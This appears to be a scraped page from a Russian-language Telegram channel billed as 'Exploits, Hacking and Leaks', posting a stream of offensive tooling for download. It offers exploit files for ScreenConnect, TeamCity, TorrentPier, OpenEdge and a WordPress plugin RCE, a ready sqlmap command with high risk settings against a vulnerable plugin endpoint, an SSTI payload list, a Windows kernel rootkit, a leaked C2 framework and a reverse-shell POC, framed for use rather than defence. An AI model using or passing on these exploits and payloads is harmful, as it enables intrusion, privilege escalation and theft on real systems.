Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
👍13😱10👌3
Ждем exploit для ScreenConnect
👍15
Linux — это теперь и CNA
Рубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.
Теперь еще и их мониторить
Почитать тут

#vuln #linux #security
👌10🔥2
Proxy Bar
Ждем exploit для ScreenConnect
Ну понеслась
😱6🔥2👌2
watchtowr-vs-ConnectWise_2024-02-21.py
2.6 KB
ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.
*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
*
👍17🔥7👌2
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине Bricks Builder
*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich

*

#RCE #wordpress
🔥21👍4👌3
ChatBot для WordPress
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
python3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p strid

а я споть
👍31🔥12😱4👌4
SSH-Snake Tool for ....lulz
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть ssh-worm
ТДН во все поля )
*
SSH-Snake
*
Почитать

#worm #ssh
🔥19👍5👌1
2024-1651_exploit.py
4.6 KB
CVE-2024-1651 exploit (RCE)
*
Дырка в Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.

#exploit #rce #linux
🔥10👍4
Banshee
*
Windows x64 Kernel Rootkit (Experimental)

*
Умеет:
- Kill processes
- Change protection levels
- Elevate any process token to SYSTEM
- Enumerating and erasing kernel callbacks
- Protecting the driver file
- Hide Process by PID
*
TODO list - обещает интересное расширение функционала
*
download win_rootkit

#win #rootkit
👍16🔥5
Ночью LockBit восстановил сервера, и выдал обращение
🔥19
👍16😱11🔥5
fbi.gov_ru.txt
32.1 KB
👍35🔥12👌7😱6
CVE-2024-27198.py
2.2 KB
CVE-2024-27198
обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server
*

#jets
🔥9👍6
Рубрика интересно
Возможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: Researchers
Link

#stuxnet
🔥9👌3😱1
Server Side Template Injection Payload List

{7*7}
*{7*7}
{{7*7}}
[[7*7]]
${7*7}
@(7*7)
<?=7*7?>
<%= 7*7 %>
${= 7*7}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]


если отдает 49 - цель уязвима

#SSTI
😱37👍9🔥5👌4
XieBroC2
C&C
Слили в открытый доступ все, кроме кода командного сервера.
download

#C2
🔥7👍4👌2
Bypass UAC
👌26🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
Уязвимость DataCube3
POC сочетает в себе CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания reverse shell
*
POC
🔥16
CVE-2024-1403
*
Progress OpenEdge Authentication Bypass
*
exploit proof of concept
👍8